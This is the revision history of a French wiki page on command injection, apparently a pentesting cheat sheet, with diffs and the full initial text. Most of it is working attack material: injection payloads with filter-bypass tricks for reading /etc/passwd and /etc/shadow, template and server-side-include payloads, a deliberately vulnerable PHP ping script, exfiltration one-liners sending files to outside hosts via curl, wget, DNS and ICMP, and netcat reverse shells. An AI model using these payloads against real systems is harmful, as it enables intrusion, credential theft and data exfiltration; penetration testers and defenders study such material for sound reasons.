Neib le 9 janvier 2024 à 01:21

2024-01-09T01:21:27Z

← Version précédente		Version du 9 janvier 2024 à 03:21
Ligne 798 :		Ligne 798 :
	*https://github.com/payloadbox/command-injection-payload-list		*https://github.com/payloadbox/command-injection-payload-list
	*https://book.hacktricks.xyz/pentesting-web/command-injection		*https://book.hacktricks.xyz/pentesting-web/command-injection

			[[Category:Hacking]][[Category:Web]]

Neib : Neib a déplacé la page Injection de Commandes vers Web:Injection de Commandes sans laisser de redirection

2024-01-06T13:50:39Z

Neib a déplacé la page Injection de Commandes vers Web:Injection de Commandes sans laisser de redirection

← Version précédente	Version du 6 janvier 2024 à 15:50
(Aucune différence)

OldNeib : /* Windows */

2023-12-02T18:59:29Z

Windows

← Version précédente		Version du 2 décembre 2023 à 20:59
Ligne 376 :		Ligne 376 :

	===== Windows =====		===== Windows =====
	~~<nowiki>~~
	`		`
	\|\|		\|\|
Ligne 785 :		Ligne 784 :
	& whoami		& whoami
	&& whoami		&& whoami
	{{ get_user_file("C:\boot.ini") }}		<nowiki>{{ get_user_file("C:\boot.ini") }}</nowiki>
	{{ get_user_file("/etc/hosts") }}		<nowiki>{{ get_user_file("/etc/hosts") }}</nowiki>
	{{4+4}}		<nowiki>{{4+4}}</nowiki>
	{{4+8}}		<nowiki>{{4+8}}</nowiki>
	{{person.secret}}		<nowiki>{{person.secret}}</nowiki>
	{{person.name}}		<nowiki>{{person.name}}</nowiki>
	{1} + {1}		{1} + {1}
	{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}		<nowiki>{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}</nowiki>
	{{[] .__ Class __.__ base __.__ subclasses __ ()}}		{{[] .__ Class __.__ base __.__ subclasses __ ()}}
	~~</nowiki>~~

	== Références ==		== Références ==

OldNeib : /* Windows */

2023-12-02T18:57:45Z

Windows

← Version précédente		Version du 2 décembre 2023 à 20:57
Ligne 376 :		Ligne 376 :

	===== Windows =====		===== Windows =====
			<nowiki>
	`		`
	\|\|		\|\|
Ligne 793 :		Ligne 794 :
	{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}		{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
	{{[] .__ Class __.__ base __.__ subclasses __ ()}}		{{[] .__ Class __.__ base __.__ subclasses __ ()}}
			</nowiki>

	== Références ==		== Références ==

OldNeib : /* Unix */

2023-12-02T18:56:30Z

Unix

← Version précédente		Version du 2 décembre 2023 à 20:56
Ligne 368 :		Ligne 368 :
	cat /etc/passwd		cat /etc/passwd
	%0Acat%20/etc/passwd		%0Acat%20/etc/passwd
	{{ get_user_file("/etc/passwd") }}		<nowiki>{{ get_user_file("/etc/passwd") }}</nowiki>
	<!--#exec cmd="/bin/cat /etc/passwd"-->		<!--#exec cmd="/bin/cat /etc/passwd"-->
	<!--#exec cmd="/bin/cat /etc/shadow"-->		<!--#exec cmd="/bin/cat /etc/shadow"-->

OldNeib : /* Unix */

2023-12-02T18:52:21Z

Unix

← Version précédente		Version du 2 décembre 2023 à 20:52
Ligne 374 :		Ligne 374 :
	system('cat /etc/passwd');		system('cat /etc/passwd');
	<?php system("cat /etc/passwd");?>		<?php system("cat /etc/passwd");?>

	===== Windows =====		===== Windows =====
	`		`

OldNeib : /* Cheat Sheet */

2023-12-02T17:49:17Z

Cheat Sheet

Voir les modifications

OldNeib : /* Références */

2023-12-02T17:42:42Z

Références

← Version précédente		Version du 2 décembre 2023 à 19:42
Ligne 275 :		Ligne 275 :
	*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection		*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
	*https://github.com/payloadbox/command-injection-payload-list		*https://github.com/payloadbox/command-injection-payload-list
			*https://book.hacktricks.xyz/pentesting-web/command-injection

OldNeib : /* ${SHELLOPTS} */

2023-12-02T17:38:24Z

${SHELLOPTS}

← Version précédente		Version du 2 décembre 2023 à 19:38
Ligne 130 :		Ligne 130 :
	;cat ${HOME:0;1}etc${HOME:0;1}passwd		;cat ${HOME:0;1}etc${HOME:0;1}passwd

	===== ${SHELLOPTS} =====		==== ${SHELLOPTS} ====
	De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:		De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

OldNeib : Page créée avec « Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères: == Les Métacharacteres == ; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule. & | Il sépare plusieurs commandes su... »

2023-12-02T17:37:55Z

Page créée avec « Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères: == Les Métacharacteres == ; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule. & | Il sépare plusieurs commandes su... »

Nouvelle page

Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
== Les Métacharacteres ==
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule.
& | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde.
&& | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante.
| | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande.
|| | Le || n'exécute la commande suivante que si la commande précédente échoue.
`` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'

Exemple simple de script PHP utilisant ping.
<?php
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
echo $response;
}
?>

Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
*127.0.0.1;ls -la
*;ls -la
*;ls%20-la
*;ls%09-la
*(...)

== Afficher le contenu d'un fichier PHP ==
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.

== Contournement de filtres ==
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.

La commande suivant le %0a sera alors exécutée.

=== Exemple de filtre maison ===
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
*127.0;.0.1
*12&7.0.0.1
*(...)

Il est donc primordial de jouer avec les espaces!
*127.0.0.1|cat password.txt
*127.0.0.1 |cat password.txt
*127.0.0.1| cat password.txt
*(...)

Une commande possible serait donc:

127.0.0.1%0als -la

On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.

=== Autre type de filtres ===
==== Double Encoding ====
Dans le cas oú l'on aurait quelque chose comme ça:

str_replace("%26", "")

On donc peut tenter un double encoding %%2626 deviendra alors %26.

==== Sans Espaces ====
Dans le cas oú les espaces serait supprimmés:

===== Le Bash Internal Field Separator: $IFS =====

;cat${IFS}/etc/passwd

===== SI IFS est blacklisté =====

;{cat,/etc/passwd}

===== Utilisation de TAB =====

;cat%09/etc/passwd

===== Line-Feed in the middle =====

;cat%0a/etc/passwd

===== Utilisation du '+' =====

;cat+/etc/passwd

===== Env Variable =====
;$var='x20';cat${var}/etc/passwd

===== Sans $ ni {} =====
;IFS=,;`cat<<</etc,/passwd`

==== Certains mots blacklistés ====
Si "cat" ou "passwd" ou "nimp" est blacklisté:

===== The Wildcard caracters =====

;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd

===== Unitialized variable $u qui a une valeur nulle =====

;cat$u /etc$u/passwd

===== Null Variable =====

;cat /et``c/pas``swd
;cat /e$()tc/pa$()sswd
;cat /etc$(dlam)/pa$(erde)sswd

===== Troncation par quote, double quotes, ou backslash =====

;/bin/c"at" /e"tc"/pa"ss"wd
;/b'i'n/c'a't /e't'c/p'a's's'w'd'
;c\at /e\tc/pa\s\swd/

===== $@ =====
;c$@at /etc/passwd

==== Sans Slash ====
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:

;cat ${HOME:0;1}etc${HOME:0;1}passwd

===== ${SHELLOPTS} =====
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

${SHELLOPTS:3:1} représente un c.
${SHELLOPTS:2:1} représente un a.
(À creuser...)
;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd

==== Reverse and Encode ====
;`echo "dwssap/cte/ tac | rev`
;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

==== Hexadecimal encode ====

;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)

== Cheat Sheet ==
=== Top 25 des paramètres pouvant conduire à une injection ===
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

=== Fonctions PHP vulnérables ===
system()
exec()
shell_exec()
open()
pcntl_exec()
ioctl_exec()
eio_syncfs()
proc_open()
popen()

Command Execution Function Filtered possible Bypass with encoding
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Reverse quotation marks are identical shell_exec()

=== Command Injection/Execution Cheat Sheet ===
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands

#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

=== DATA Exfiltration ===
Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([https://requestcatcher.com/])

==== cURL ====
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php
$ curl -d "@file" -X POST http://domain.com

==== cURL avec FTP ====
$ curl -T file ftp://ip -user nick:pass

==== Netcat ====
$ nc -l -p {port} < {file to extract}

==== ICMP ====
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.

Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done

Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.

==== DNS ====
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done
for i in $(cat password.txt); do host $i.hkj.com; done

Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.

==== Time based data exfiltration ====
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

==== Reverse Shell ====
Avec Netcat:
nc -L -p port -e cmd.exe (Windows)
nc -l -p port -e /bin/bash (*nix)

===== Se connecter =====
====== Netcat ======
$ nc {ip} {port}
$ nc {ip} {port} > output

(Windows)
type {file to extract} | nc -L -p {port}

====== wget ======
wget --post-data exfile=`cat /path/to/file` http://domain.com
wget --post-file file http://domain.com

====== Telnet ======
telnet ip port < file

== Références ==
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
*https://github.com/payloadbox/command-injection-payload-list

Web:Injection de Commandes - Historique des versions

Neib le 9 janvier 2024 à 01:21

Neib : Neib a déplacé la page Injection de Commandes vers Web:Injection de Commandes sans laisser de redirection

OldNeib : /* Windows */

OldNeib : /* Windows */

OldNeib : /* Unix */

OldNeib : /* Unix */

OldNeib : /* Cheat Sheet */

OldNeib : /* Références */

OldNeib : /* ${SHELLOPTS} */

Neib : Neib a déplacé la page Injection de Commandes vers Web:Injection de Commandes sans laisser de redirection

OldNeib : /* Windows */

OldNeib : /* Windows */

OldNeib : /* Unix */

OldNeib : /* Unix */

OldNeib : /* Cheat Sheet */

OldNeib : /* Références */

OldNeib : /* ${SHELLOPTS} */